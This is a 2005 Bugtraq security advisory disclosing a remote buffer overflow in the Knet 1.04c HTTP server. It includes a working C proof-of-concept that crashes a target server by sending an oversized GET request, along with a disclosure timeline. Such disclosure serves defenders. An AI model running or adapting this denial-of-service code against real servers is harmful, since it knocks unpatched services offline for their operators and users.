Knet <= 1.04c Buffer Overflow Bug

From: CorryL (corryl_at_sitoverde.com)
Date: 02/25/05

  • Next message: Paul: "Re: Office 10 applications & flashdrives can be used to browse restricted drives" 
    To: "bugtraq" <bugtraq@securityfocus.com>
Date: Fri, 25 Feb 2005 23:37:24 +0100

    -=[--------------------ADVISORY-------------------]=-
    -=[
         ]=-
    -=[ Knet <= 1.04c ]=-
    -=[
         ]=-
    -=[ Author: CorryL [corryl80@gmail.com] ]=-
    -=[ x0n3-h4ck.org]=-
    -=[-----------------------------------------------------]=-

    -=[+] Application: Knet
    -=[+] Version: 1.04c
    -=[+] Vendor's URL: www.stormystudios.com
    -=[+] Platform: Windows
    -=[+] Bug type: Buffer overflow
    -=[+] Exploitation: Remote
    -=[-]
    -=[+] Author: CorryL ~ CorryL[at]gmail[dot]com ~
    -=[+] Reference: www.x0n3-h4ck.org

    ..::[ Descriprion ]::..

    Knet is an small http server,easy installation and use.

    ..::[ Bug ]::..

    This software is affected a Buffer Overflow.
    A malitious attacker sending the request GET AAAAAA..... to 522,
    this cause the overwrite of the eip registry,causing the execution of
    malicious code.

    ..::[ Proof Of Concept ]::..

    GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... to 522 byte long

    ..::[ Exploit ]::..

    /*

          KNet <= 1.04c is affected to a remote buffer overflow in GET command.
       This PoC demostrate the vulnerability.

          KNet <= 1.04c PoC Denial Of Service Coded by: Expanders

          Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>

    */

    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    void help(char *program_name);

    int main(int argc, char *argv[]) {

        struct sockaddr_in trg;
        struct hostent *he;
     long addr;
        int sockfd, buff,rc;
     char evilbuf[1024];
     char buffer[1024];
     char *request;
     if(argc < 3 ) {
      help(argv[0]);
      exit(0);
     }
     printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
        he = gethostbyname(argv[1]);
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
     request = (char *) malloc(12344);
        trg.sin_family = AF_INET;
        trg.sin_port = htons(atoi(argv[2]));
        trg.sin_addr = *((struct in_addr *) he->h_addr);
        memset(&(trg.sin_zero), '\0', 8);
     printf("\n\nConnecting to target \t...");
     rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
     if(rc==0)
     {
      printf("[Done]\nBuilding evil buffer\t...");
      memset(evilbuf,90,1023);
      printf("[Done]\nSending evil request \t...");
      sprintf(request,"GET %s \n\r\n\r",evilbuf);
      send(sockfd,request,strlen(request),0);
      printf("[Done]\n\n[Finished] Check the server now\n");
     }
     else
      printf("[Fail] -> Unable to connect\n\n");
     close(sockfd);
     return 0;

    }

    void help(char *program_name) {

     printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
     printf("\t-=[ ]=-\n");
     printf("\t-=[ Coded by
    ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
     printf("Usage: %s <Host> <Port>\n",program_name);
    }

    ..::[ Workaround ]::..

    Waiting for an official patch

    ..::[ Disclousure Timeline ]::..

    [17/02/2005] - Vendor notification
    [17/02/2005] - Vendor Response
    [25/02/2005] - No patch relase from vendor
    [25/02/2005] - Public disclousure

    _________________________________
    www.seekstat.it is your web stat

  • Next message: Paul: "Re: Office 10 applications & flashdrives can be used to browse restricted drives"